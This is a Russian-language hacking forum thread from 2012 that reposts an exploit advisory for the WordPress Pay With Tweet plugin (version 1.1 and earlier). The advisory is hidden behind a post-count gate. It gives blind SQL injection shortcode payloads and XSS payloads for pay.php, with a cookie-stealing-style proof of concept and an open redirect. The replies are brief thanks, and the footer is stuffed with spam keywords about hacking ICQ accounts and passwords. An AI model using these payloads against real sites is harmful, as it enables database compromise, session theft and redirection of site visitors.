Старый 15.01.2012, 20:02   #1
(Rossia)
Изгнан
 
Аватар для (Rossia)
 
Регистрация: 12.03.2011
Сообщений: 199
(Rossia) скоро придёт к известности(Rossia) скоро придёт к известности
(Rossia) вне форума

По умолчанию # Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities


# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple
Vulnerabilities


[HIDE]50
Код:
1) Blind SQL Injection in shortcode:
 Short code parameter ‘id’ is prone to blind sqli,
 you need to be able to write a post/page to exploit this:

 [paywithtweet id="1' AND 1=2"]
 [paywithtweet id="1' AND 1=1"]

 2) Multiple XSS in pay.php

[Ссылки доступны только зарегистрированным пользователям
. Зарегистрируйся, чтобы увидеть ссылку.]

After connecting to twitter:
 ?link=&22></input>[XSS]
 After submitting the tweet:
 ?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS]

 
POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script>
[/HIDE]

[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Последний раз редактировалось (Rossia); 15.01.2012 в 20:04.
Ответ: # Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabili
Старый 20.01.2012, 12:40   #2
dhak909
Изгнан
 
Аватар для dhak909
 
Регистрация: 10.11.2011
Сообщений: 2
dhak909 Новичок
dhak909 вне форума
По умолчанию Ответ: # Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabili

Спасибо то что надо
  Ответить с цитированием
Ответ: # Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabili
Старый 20.01.2012, 18:51   #3
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: # Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabili

[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Эта тема для кого создана???????????????????????7
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot